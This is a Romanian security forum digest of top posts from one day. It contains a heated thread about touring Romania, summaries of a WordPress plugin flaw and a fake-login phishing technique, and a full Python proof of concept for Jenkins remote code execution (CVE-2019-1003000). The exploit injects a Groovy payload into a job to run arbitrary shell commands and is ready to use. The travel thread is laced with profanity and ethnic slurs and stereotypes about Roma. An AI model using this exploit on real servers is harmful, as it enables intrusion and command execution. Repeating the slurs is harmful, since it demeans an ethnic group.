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Showing content with the highest reputation on 02/19/19 in all areas

  1. Ba mai iesiti in pula mea din casa, din tara si apoi vorbiti!Auzi la ala sa se duca in Italia ca la noi sunt soferi prosti.Pai italienii sunt cei mai prosti soferi din Europa, esti nebun!?Cu privire la tigani, nu stiu de unde si pana unde i-ati adus in discutie pentru ca omul a intrebat cu totul altceva, si, si asa cu siguranta cand o sa vina nu cauta o satra de tigani cauta obiective turistice, trasee...Tigani pe toate strazile mai gasesti doar in Irlanda,Anglia, Italia, Spania, in Ro au inceput sa se rareasca....In 2017 peste 12 milioane de turisti straini au vizitat Romania, va asigur ca multi din ei stiu mai multe lucruri despre Romania decat stiti voi, tocmai de aia ne si viziteaza!Tara asta pe care voi o vedeti de cacat, are multe chestii pe care nu le gasesti in toata Europa si chiar si in lume!Dupa parerea mea mai de cacat sunt oamenii ca voi care traiesc aici si au o asa gandire si mentalitate(ca tara e de cacat si nu se mai poate face nimic).Ca voi sunt oamenii aia care trec pe rosu la semafor, care arunca gunoaie, care parcheaza aiurea, care depasesc colana pe linia de tramvai, cei care iau si dau mita, fura, injura si scuipa pe strada si multe altele...Romanul dupa ce inchide usa la casa il doare in pula de ce este afara.(uneori mai arunca si gunoiul pe geam sau bradul de craciun)
    2 points
  2. Programarea retelelor de calculatoare. Materie facuta in 2 ani diferiti, part1 = primul an, part2 = al doilea an. In mare parte, cam ce e in part2, e si in partea 1. https://drive.google.com/open?id=1tEbiZT6rYXgWgqFEydH3yPsEgOT-SzH9
    1 point
  3. Software Overview WordPress plugin Simple Social Buttons is a popular free and paid plugin that brings the ability to add social media sharing buttons on the sidebar, inline, above and below the content of the post, on photos, popups, fly-ins. The plugin has over 40,000+ active installations according to WordPress Plugin repository and over 500,000 downloads according to plugin vendor WPBrigade. Vulnerability Description Improper application design flow, chained with lack of permission check resulted in privilege escalation and unauthorized actions in WordPress installation allowing non-admin users, even subscriber user type to modify WordPress installation options from the wp_options table. As can be seen from the screenshot, a function would iterate through JSON object provided in the request and update all options with option_name from object key and option_value from a key value without checking whether the current user has permission to manage options or provided option_name belongs to that plugin. sursa:https://www.webarxsecurity.com/wordpress-plugin-simple-social-buttons/
    1 point
  4. Recomand cu incredere !
    1 point
  5. @gigiRoman Of course that i will share with you my experience when i came back. As i mentioned before, I was already in Timisoara several times (with travel agency from Kikinda (Chichinda Mare)). You see that i was back, so definetelly it is not shitty country as someone mention before. I understand that for most people foreign is better then yours but it is not always true. As tourist, I usually walking alone without guide and other people in tourist group. I dont give a shit for gypsies. I didnt notice them in Timisoara and so far i didnt had any problem. @ gaddafi Thank You for translation. Ride in west is not option for me. Why? It is simple. Croatia - I agree that it is beautiful country with great coast (we was one country before - Yugoslavia) but...Time and people are changed. They dont love us and threat as some kind of enemy and lower race. Sometimes I think that they have generic hate for Serbs. It is complicated story. Italia - it is expensive too much for our standard. And i want to more connect with Romania and Romanian people. Fun Fact: I have your large flag (300x150cm) on my wall so Romania is only option where i want to discover and ride across.
    1 point
  6. @MIKE.01 said that Romania is not a shitty country full of gypsies and people who can't drive. The gypsies are now honest and hard-working citizens of England, Spain, Italy. Romania is a beautiful country where 12 million foreign tourists come every year and we don't appreciate our country as much as foreigners do. They even know much more about our country than us. Pula=dick, tigani=gypsy, cacat=shit, gunoi=trash/scumbag Quo contradicted him regarding how bad we drive and I about how HE DOESN'T KNOW how many foreign tourists come to Romania. I challenge him to tell us what worldwide unique tourist attraction do we have. I encourage you to go west bike riding. FUCK ROMANIA!!! Sveti Jure, Croatia Stelvio Pass, Italy Gotthard Pass, Switzerland Grossglockner Pass, Austria
    1 point
  7. Frați, nu știu prea bine romanește Vorbești engleza, va rog. What you discuss in previously posts?
    1 point
  8. Nu ma pun cu mintea prostului pentru ca e odihnita. Insa cifrele vorbesc de la sine: https://etsc.eu/euroadsafetydata/ https://ec.europa.eu/transport/facts-fundings/scoreboard/compare/investments-infrastructure/quality-roads_en
    1 point
  9. Plus ca ii explica sarbului cum e cu tiganii pe la noi, cand la aia tiganii fac legea...daca nici sarbul nu stie cum arata un tigan...🐼
    1 point
  10. WARNING – New Phishing Attack That Even Most Vigilant Users Could Fall For February 15, 2019Mohit Kumar How do you check if a website asking for your credentials is fake or legit to log in? By checking if the URL is correct? By checking if the website address is not a homograph? By checking if the site is using HTTPS? Or using software or browser extensions that detect phishing domains? Well, if you, like most Internet users, are also relying on above basic security practices to spot if that "Facebook.com" or "Google.com" you have been served with is fake or not, you may still fall victim to a newly discovered creative phishing attack and end up in giving away your passwords to hackers. Antoine Vincent Jebara, co-founder and CEO of password managing software Myki, told The Hacker News that his team recently spotted a new phishing attack campaign "that even the most vigilant users could fall for." Vincent found that cybercriminals are distributing links to blogs and services that prompt visitors to first "login using Facebook account" to read an exclusive article or purchase a discounted product. That’s fine. Login with Facebook or any other social media service is a safe method and is being used by a large number of websites to make it easier for visitors to sign up for a third-party service quickly. Generally, when you click "log in with Facebook" button available on any website, you either get redirected to facebook.com or are served with facebook.com in a new pop-up browser window, asking you to enter your Facebook credentials to authenticate using OAuth and permitting the service to access your profile’s necessary information. However, Vincent discovered that the malicious blogs and online services are serving users with a very realistic-looking fake Facebook login prompt after they click the login button which has been designed to capture users’ entered credentials, just like any phishing site. As shown in the video demonstration Vincent shared with The Hacker News, the fake pop-up login prompt, actually created with HTML and JavaScript, are perfectly reproduced to look and feel exactly like a legitimate browser window—a status bar, navigation bar, shadows and URL to the Facebook website with green lock pad indicating a valid HTTPS. Moreover, users can also interact with the fake browser window, drag it here-and-there or exit it in the same way any legitimate window acts. The only way to protect yourself from this type of phishing attack, according to Vincent, "is to actually try to drag the prompt away from the window it is currently displayed in. If dragging it out fails (part of the popup disappears beyond the edge of the window), it's a definite sign that the popup is fake." Besides this, it is always recommended to enable two-factor authentication with every possible service, preventing hackers from accessing your online accounts if they somehow manage to get your credentials. Phishing schemes are still one of the most severe threats to users as well as companies, and hackers continue to try new and creative ways to trick you into providing them with your sensitive and financial details that they could later use to steal your money or hack into your online accounts. Stay tuned, stay safe! Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group. Sursa: https://thehackernews.com/2019/02/advance-phishing-login-page.html?m=1
    1 point
  11. #!/usr/bin/python # Author: Adam Jordan # Date: 2019-02-15 # Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc # PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative) import argparse import jenkins import time from xml.etree import ElementTree payload = ''' import org.buildobjects.process.ProcBuilder @Grab('org.buildobjects:jproc:2.2.3') class Dummy{ } print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString() ''' def run_command(url, cmd, job_name, username, password): print '[+] connecting to jenkins...' server = jenkins.Jenkins(url, username, password) print '[+] crafting payload...' ori_job_config = server.get_job_config(job_name) et = ElementTree.fromstring(ori_job_config) et.find('definition/script').text = payload % cmd job_config = ElementTree.tostring(et, encoding='utf8', method='xml') print '[+] modifying job with payload...' server.reconfig_job(job_name, job_config) time.sleep(3) print '[+] putting job build to queue...' queue_number = server.build_job(job_name) time.sleep(3) print '[+] waiting for job to build...' queue_item_info = {} while 'executable' not in queue_item_info: queue_item_info = server.get_queue_item(queue_number) time.sleep(1) print '[+] restoring job...' server.reconfig_job(job_name, ori_job_config) print '[+] fetching output...' last_build_number = server.get_job_info(job_name)['lastBuild']['number'] console_output = server.get_build_console_output(job_name, last_build_number) print '[+] OUTPUT:' print console_output if __name__ == '__main__': parser = argparse.ArgumentParser(description='Jenkins RCE') parser.add_argument('--url', help='target jenkins url') parser.add_argument('--cmd', help='system command to be run') parser.add_argument('--job', help='job name') parser.add_argument('--username', help='username') parser.add_argument('--password', help='password') args = parser.parse_args() run_command(args.url, args.cmd, args.job, args.username, args.password) Sursa: https://gist.github.com/adamyordan/96da0ad5e72cbc97285f2df340cac43b
    1 point
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